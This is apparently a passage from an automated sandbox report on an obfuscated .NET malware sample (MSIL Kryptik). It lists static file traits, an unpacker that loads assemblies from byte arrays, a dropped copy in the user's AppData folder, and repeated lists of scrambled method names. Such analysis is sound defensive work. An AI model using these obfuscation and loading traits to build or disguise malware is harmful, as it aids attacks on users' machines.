                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic file information: File size 1144840 > 1048576
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x10f400
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4f00000.4.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs.Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.cs.Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.cs.Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs.Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, qVTa4C2qFjWp91p9EE.cs.Net Code: R5tfS8mNbg System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CBE1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044FAC55 push FFFFFF8Bh; iretd 0_2_044FAC57
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_10002806 push ecx; ret 9_2_10002819
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00457186 push ecx; ret 15_2_00457199
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0045E55D push esi; ret 15_2_0045E566
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00457AA8 push eax; ret 15_2_00457AC6
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00434EB6 push ecx; ret 15_2_00434EC9
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044693D push ecx; ret 17_2_0044694D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044DB70 push eax; ret 17_2_0044DB84
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0044DB70 push eax; ret 17_2_0044DBAC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00451D54 push eax; ret 17_2_00451D61
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00451D34 push eax; ret 19_2_00451D41
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00444E71 push ecx; ret 19_2_00444E81
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00414060 push eax; ret 20_2_00414074
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00414060 push eax; ret 20_2_0041409C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00414039 push ecx; ret 20_2_00414049
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: section name: .text entropy: 7.743373705728743
                    Source: mXJeXQoaGktJCW.exe.0.drStatic PE information: section name: .text entropy: 7.743373705728743
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, uwB1hsrNlOFW0DGWr7.csHigh entropy of concatenated method names: 'mS9URhvLZP', 'hMBUZokQpO', 'TbeUOiVsLs', 'skwUW775Ao', 'xXXUti6rg3', 'Pe0UeKNmXn', 'gqkUBUpSpH', 'X7lU5438GY', 'byoUdRMvgV', 'nK3UoVlGNR'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, kYFp04GVFWfjctExZu.csHigh entropy of concatenated method names: 'a1by3YgvEe', 'yvtyQZUp8r', 'Vuub8lYq5o', 'uw4b7NfbIR', 'JVSyoYumlB', 'nNKyNGwSeL', 'hfGyuAbFyx', 'nvvyhm6bSl', 't0iyXjELC0', 'dYsyPVu4JF'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, awBYIillJCrx859gbfK.csHigh entropy of concatenated method names: 'ToString', 'hmCGTqwnBc', 'v4AGfCxGIU', 'iFcGM1JJMv', 'qrdGH2eVKL', 'WgHGaQicsB', 'KePGnNaNQJ', 'Su9GkplT50', 'cA4b6wCLY8FvAWiDOii', 'z9DULECH3MyDADYdsgo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, OUJVU18LcdRqehKk9N.csHigh entropy of concatenated method names: 'rdoYHNd3pk', 'PeoYn5PrqI', 'V2GYL7RdbX', 'VR0LQ27H76', 'Qt4LzmShoP', 'SgCY8Z3qVK', 'ToYY7Ubn0d', 'IqaYr5ubAk', 'yEhYTnM1NF', 'xvpYfTaYsj'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, XtEEgg9xesWJtxv6yV.csHigh entropy of concatenated method names: 'OjZSJcL6r', 'AAji7vYCg', 'RQZweX3Lj', 'qRQDfUwUQ', 'rL5Z1DWUV', 'eX0980NPl', 'gqX7qoXUH2BTduFtn6', 'v3VEalsYYLsS91uYsZ', 'Bsxbibst6', 'pSQGbUAHg'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, QBTSLvlpZKgHT3rkupM.csHigh entropy of concatenated method names: 'r2ZvlXO8k0', 'zFhv6IQ0NV', 'f9PvST7QNm', 'PMqviMsjcs', 'gKGvgtMi9Z', 'En2vw1FqjU', 'qHIvDT9aT9', 'sO9vRpRsFq', 'paHvZXY0q9', 'fhtv9Gbd7n'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, uqSYAbh6QxVZvqyqsQ.csHigh entropy of concatenated method names: 'XYNy0sfMZp', 'EkRyIw3dRh', 'ToString', 'aCayHXQ2Qs', 'fXjyaWTtwC', 'eUjynUnANo', 'AetykAkHPp', 'KRAyLPcJAt', 'Qs0yYxygpL', 'b6JyV2X8DU'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, AtSJYkzd1YVml9kH6m.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vEuvU8L7he', 'swXvmkB1oc', 'DVCvj9yjtA', 'lmvvyirajL', 'tASvbitbP3', 'OeOvvQpL3U', 'A9LvGuYZwo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, DZhuR1lEXb724OFE0jy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't2VGhN3ExU', 'LA8GXIRNYw', 'xMVGPOUeva', 'bfWGCSuiX5', 'SCZGF8Rfip', 's83GcRcNkf', 'QykGpZaBaB'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, yYA4bnqoCZikPYmxm6.csHigh entropy of concatenated method names: 'MCVmdrT7fi', 'LAHmND0iRC', 'UidmhGKblA', 'eGAmXUpkEU', 'hKnmWTdTLc', 'BtAm133pgB', 'cvPmti9FN7', 'RcSmeltXq6', 'A1dmsQxxCP', 'VsomBJBZPo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, UeQWNuckJlDLwjm9Mk.csHigh entropy of concatenated method names: 'XB37YihV46', 'GTS7Vepn2W', 'tKd70BZJgP', 'Tru7IX7bxU', 'kpZ7mkgZNH', 'Nn57jyXWNN', 'VXik8EPIx5ShcD9NU2', 'leE0Vk5jOBW7yJlcGr', 'mWD77rLu4u', 'hi67TJedoL'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.csHigh entropy of concatenated method names: 'GYQTMFMJ6G', 'f9JTHsFR24', 'IeTTaE0Xty', 'CYDTnYT9Cd', 'aeTTksmyNA', 'WvTTL6MTdy', 'qirTYcBnX3', 'l05TVCLMMn', 'z5STJsFF7o', 'lB1T0IY63g'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, yyrLeV732OmOLQWpNj.csHigh entropy of concatenated method names: 'ToString', 'lA9joK7p4L', 'zNljWgdjhb', 'cCcj1eZoa6', 'hdKjtudPrI', 'GBljejLJ0I', 'c08jsM3WrQ', 'qIvjBBvUfd', 'xs0j5oYdqd', 'BvEjqOaZta'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, hOeFcZoKQuGvhRZZQ2.csHigh entropy of concatenated method names: 'Dispose', 'ej074jAIDL', 'GcarW13YJS', 'z9TKKPwifM', 'Mff7QdNoYU', 'xpm7z54F4O', 'ProcessDialogKey', 'xOhr81asmj', 'GsFr7B9D0g', 'o2Mrr8pR0v'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, jEORRnfif3v3h627MY.csHigh entropy of concatenated method names: 'vSSLMRHr64', 'msQLaJp8xH', 'z7aLkHuALv', 'K2vLY2xA0c', 'UKiLVGRYLr', 'QQykF6Yh5B', 'AROkcaXrE2', 'o1ikpP1dQD', 'dPkk38jcBQ', 'Q0bk4Hpf2D'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, c3ElsUsg35p7GQ8AoN.csHigh entropy of concatenated method names: 'Qiwv76oP5n', 'mYWvT2mLKa', 'Yntvf6yyF3', 'KPJvHRg4yY', 'klvvaem1Jg', 'ILevkN8iPx', 'HaFvLUyQ5g', 'rBKbpmGEXd', 'cK2b3onibN', 'oLEb4WitnE'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, QhBFofCVxaxcONJT4Z.csHigh entropy of concatenated method names: 'mifahPSjre', 'kg0aXfBmB9', 'zfYaPrSY27', 'XGbaCqAaZ3', 'q9CaFEWwAu', 'uTiacsmHJG', 'AZQapgAQmW', 'eYQa3OwpsQ', 'Ouua4DmZLa', 'H4maQER44j'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, PbFXXttaZcfdoJYktQ.csHigh entropy of concatenated method names: 'oxxbH7FIvr', 'o4cbaRX7cs', 'tWwbnDfLYs', 'kXXbk7td83', 'zg2bLqOnoT', 'aE6bYgvPNC', 'u0PbV97TiW', 'gEgbJOKEBe', 'exrb0aInKK', 'QZYbIEksYT'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, BLh0makLbVCyodwVhw.csHigh entropy of concatenated method names: 'tuwniu2lRy', 'B7unwbJtLT', 'TKinRXd4My', 'XlLnZb3JCq', 'HninmPpFVT', 'CsgnjrXI1Y', 'xWqnyLdjag', 'rNKnbK05G4', 'DHHnvL7pYx', 'gMmnGhBnCZ'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, vZx1jpD6tHD72wa9Ou.csHigh entropy of concatenated method names: 'JxGYlthK27', 'KUTY67JLqY', 'nJIYSbSlSa', 'P4HYiH9cJs', 'wD4YgHIvt2', 'cQ9YwjTMkA', 'rFmYDTQLwY', 'RSOYRcN5GR', 'SW2YZMSi09', 'mccY95XAtB'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, uwB1hsrNlOFW0DGWr7.csHigh entropy of concatenated method names: 'mS9URhvLZP', 'hMBUZokQpO', 'TbeUOiVsLs', 'skwUW775Ao', 'xXXUti6rg3', 'Pe0UeKNmXn', 'gqkUBUpSpH', 'X7lU5438GY', 'byoUdRMvgV', 'nK3UoVlGNR'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, kYFp04GVFWfjctExZu.csHigh entropy of concatenated method names: 'a1by3YgvEe', 'yvtyQZUp8r', 'Vuub8lYq5o', 'uw4b7NfbIR', 'JVSyoYumlB', 'nNKyNGwSeL', 'hfGyuAbFyx', 'nvvyhm6bSl', 't0iyXjELC0', 'dYsyPVu4JF'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, awBYIillJCrx859gbfK.csHigh entropy of concatenated method names: 'ToString', 'hmCGTqwnBc', 'v4AGfCxGIU', 'iFcGM1JJMv', 'qrdGH2eVKL', 'WgHGaQicsB', 'KePGnNaNQJ', 'Su9GkplT50', 'cA4b6wCLY8FvAWiDOii', 'z9DULECH3MyDADYdsgo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, OUJVU18LcdRqehKk9N.csHigh entropy of concatenated method names: 'rdoYHNd3pk', 'PeoYn5PrqI', 'V2GYL7RdbX', 'VR0LQ27H76', 'Qt4LzmShoP', 'SgCY8Z3qVK', 'ToYY7Ubn0d', 'IqaYr5ubAk', 'yEhYTnM1NF', 'xvpYfTaYsj'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, XtEEgg9xesWJtxv6yV.csHigh entropy of concatenated method names: 'OjZSJcL6r', 'AAji7vYCg', 'RQZweX3Lj', 'qRQDfUwUQ', 'rL5Z1DWUV', 'eX0980NPl', 'gqX7qoXUH2BTduFtn6', 'v3VEalsYYLsS91uYsZ', 'Bsxbibst6', 'pSQGbUAHg'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, QBTSLvlpZKgHT3rkupM.csHigh entropy of concatenated method names: 'r2ZvlXO8k0', 'zFhv6IQ0NV', 'f9PvST7QNm', 'PMqviMsjcs', 'gKGvgtMi9Z', 'En2vw1FqjU', 'qHIvDT9aT9', 'sO9vRpRsFq', 'paHvZXY0q9', 'fhtv9Gbd7n'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, uqSYAbh6QxVZvqyqsQ.csHigh entropy of concatenated method names: 'XYNy0sfMZp', 'EkRyIw3dRh', 'ToString', 'aCayHXQ2Qs', 'fXjyaWTtwC', 'eUjynUnANo', 'AetykAkHPp', 'KRAyLPcJAt', 'Qs0yYxygpL', 'b6JyV2X8DU'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, AtSJYkzd1YVml9kH6m.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vEuvU8L7he', 'swXvmkB1oc', 'DVCvj9yjtA', 'lmvvyirajL', 'tASvbitbP3', 'OeOvvQpL3U', 'A9LvGuYZwo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, DZhuR1lEXb724OFE0jy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't2VGhN3ExU', 'LA8GXIRNYw', 'xMVGPOUeva', 'bfWGCSuiX5', 'SCZGF8Rfip', 's83GcRcNkf', 'QykGpZaBaB'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, yYA4bnqoCZikPYmxm6.csHigh entropy of concatenated method names: 'MCVmdrT7fi', 'LAHmND0iRC', 'UidmhGKblA', 'eGAmXUpkEU', 'hKnmWTdTLc', 'BtAm133pgB', 'cvPmti9FN7', 'RcSmeltXq6', 'A1dmsQxxCP', 'VsomBJBZPo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, UeQWNuckJlDLwjm9Mk.csHigh entropy of concatenated method names: 'XB37YihV46', 'GTS7Vepn2W', 'tKd70BZJgP', 'Tru7IX7bxU', 'kpZ7mkgZNH', 'Nn57jyXWNN', 'VXik8EPIx5ShcD9NU2', 'leE0Vk5jOBW7yJlcGr', 'mWD77rLu4u', 'hi67TJedoL'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.csHigh entropy of concatenated method names: 'GYQTMFMJ6G', 'f9JTHsFR24', 'IeTTaE0Xty', 'CYDTnYT9Cd', 'aeTTksmyNA', 'WvTTL6MTdy', 'qirTYcBnX3', 'l05TVCLMMn', 'z5STJsFF7o', 'lB1T0IY63g'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, yyrLeV732OmOLQWpNj.csHigh entropy of concatenated method names: 'ToString', 'lA9joK7p4L', 'zNljWgdjhb', 'cCcj1eZoa6', 'hdKjtudPrI', 'GBljejLJ0I', 'c08jsM3WrQ', 'qIvjBBvUfd', 'xs0j5oYdqd', 'BvEjqOaZta'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, hOeFcZoKQuGvhRZZQ2.csHigh entropy of concatenated method names: 'Dispose', 'ej074jAIDL', 'GcarW13YJS', 'z9TKKPwifM', 'Mff7QdNoYU', 'xpm7z54F4O', 'ProcessDialogKey', 'xOhr81asmj', 'GsFr7B9D0g', 'o2Mrr8pR0v'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, jEORRnfif3v3h627MY.csHigh entropy of concatenated method names: 'vSSLMRHr64', 'msQLaJp8xH', 'z7aLkHuALv', 'K2vLY2xA0c', 'UKiLVGRYLr', 'QQykF6Yh5B', 'AROkcaXrE2', 'o1ikpP1dQD', 'dPkk38jcBQ', 'Q0bk4Hpf2D'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, c3ElsUsg35p7GQ8AoN.csHigh entropy of concatenated method names: 'Qiwv76oP5n', 'mYWvT2mLKa', 'Yntvf6yyF3', 'KPJvHRg4yY', 'klvvaem1Jg', 'ILevkN8iPx', 'HaFvLUyQ5g', 'rBKbpmGEXd', 'cK2b3onibN', 'oLEb4WitnE'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, QhBFofCVxaxcONJT4Z.csHigh entropy of concatenated method names: 'mifahPSjre', 'kg0aXfBmB9', 'zfYaPrSY27', 'XGbaCqAaZ3', 'q9CaFEWwAu', 'uTiacsmHJG', 'AZQapgAQmW', 'eYQa3OwpsQ', 'Ouua4DmZLa', 'H4maQER44j'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, PbFXXttaZcfdoJYktQ.csHigh entropy of concatenated method names: 'oxxbH7FIvr', 'o4cbaRX7cs', 'tWwbnDfLYs', 'kXXbk7td83', 'zg2bLqOnoT', 'aE6bYgvPNC', 'u0PbV97TiW', 'gEgbJOKEBe', 'exrb0aInKK', 'QZYbIEksYT'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, BLh0makLbVCyodwVhw.csHigh entropy of concatenated method names: 'tuwniu2lRy', 'B7unwbJtLT', 'TKinRXd4My', 'XlLnZb3JCq', 'HninmPpFVT', 'CsgnjrXI1Y', 'xWqnyLdjag', 'rNKnbK05G4', 'DHHnvL7pYx', 'gMmnGhBnCZ'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, vZx1jpD6tHD72wa9Ou.csHigh entropy of concatenated method names: 'JxGYlthK27', 'KUTY67JLqY', 'nJIYSbSlSa', 'P4HYiH9cJs', 'wD4YgHIvt2', 'cQ9YwjTMkA', 'rFmYDTQLwY', 'RSOYRcN5GR', 'SW2YZMSi09', 'mccY95XAtB'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, uwB1hsrNlOFW0DGWr7.csHigh entropy of concatenated method names: 'mS9URhvLZP', 'hMBUZokQpO', 'TbeUOiVsLs', 'skwUW775Ao', 'xXXUti6rg3', 'Pe0UeKNmXn', 'gqkUBUpSpH', 'X7lU5438GY', 'byoUdRMvgV', 'nK3UoVlGNR'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, kYFp04GVFWfjctExZu.csHigh entropy of concatenated method names: 'a1by3YgvEe', 'yvtyQZUp8r', 'Vuub8lYq5o', 'uw4b7NfbIR', 'JVSyoYumlB', 'nNKyNGwSeL', 'hfGyuAbFyx', 'nvvyhm6bSl', 't0iyXjELC0', 'dYsyPVu4JF'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, awBYIillJCrx859gbfK.csHigh entropy of concatenated method names: 'ToString', 'hmCGTqwnBc', 'v4AGfCxGIU', 'iFcGM1JJMv', 'qrdGH2eVKL', 'WgHGaQicsB', 'KePGnNaNQJ', 'Su9GkplT50', 'cA4b6wCLY8FvAWiDOii', 'z9DULECH3MyDADYdsgo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, OUJVU18LcdRqehKk9N.csHigh entropy of concatenated method names: 'rdoYHNd3pk', 'PeoYn5PrqI', 'V2GYL7RdbX', 'VR0LQ27H76', 'Qt4LzmShoP', 'SgCY8Z3qVK', 'ToYY7Ubn0d', 'IqaYr5ubAk', 'yEhYTnM1NF', 'xvpYfTaYsj'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, XtEEgg9xesWJtxv6yV.csHigh entropy of concatenated method names: 'OjZSJcL6r', 'AAji7vYCg', 'RQZweX3Lj', 'qRQDfUwUQ', 'rL5Z1DWUV', 'eX0980NPl', 'gqX7qoXUH2BTduFtn6', 'v3VEalsYYLsS91uYsZ', 'Bsxbibst6', 'pSQGbUAHg'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, QBTSLvlpZKgHT3rkupM.csHigh entropy of concatenated method names: 'r2ZvlXO8k0', 'zFhv6IQ0NV', 'f9PvST7QNm', 'PMqviMsjcs', 'gKGvgtMi9Z', 'En2vw1FqjU', 'qHIvDT9aT9', 'sO9vRpRsFq', 'paHvZXY0q9', 'fhtv9Gbd7n'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, uqSYAbh6QxVZvqyqsQ.csHigh entropy of concatenated method names: 'XYNy0sfMZp', 'EkRyIw3dRh', 'ToString', 'aCayHXQ2Qs', 'fXjyaWTtwC', 'eUjynUnANo', 'AetykAkHPp', 'KRAyLPcJAt', 'Qs0yYxygpL', 'b6JyV2X8DU'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, AtSJYkzd1YVml9kH6m.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vEuvU8L7he', 'swXvmkB1oc', 'DVCvj9yjtA', 'lmvvyirajL', 'tASvbitbP3', 'OeOvvQpL3U', 'A9LvGuYZwo'
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, DZhuR1lEXb724OFE0jy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't2VGhN3ExU', 'LA8GXIRNYw', 'xMVGPOUeva', 'bfWGCSuiX5', 'SCZGF8Rfip', 's83GcRcNkf', 'QykGpZaBaB'
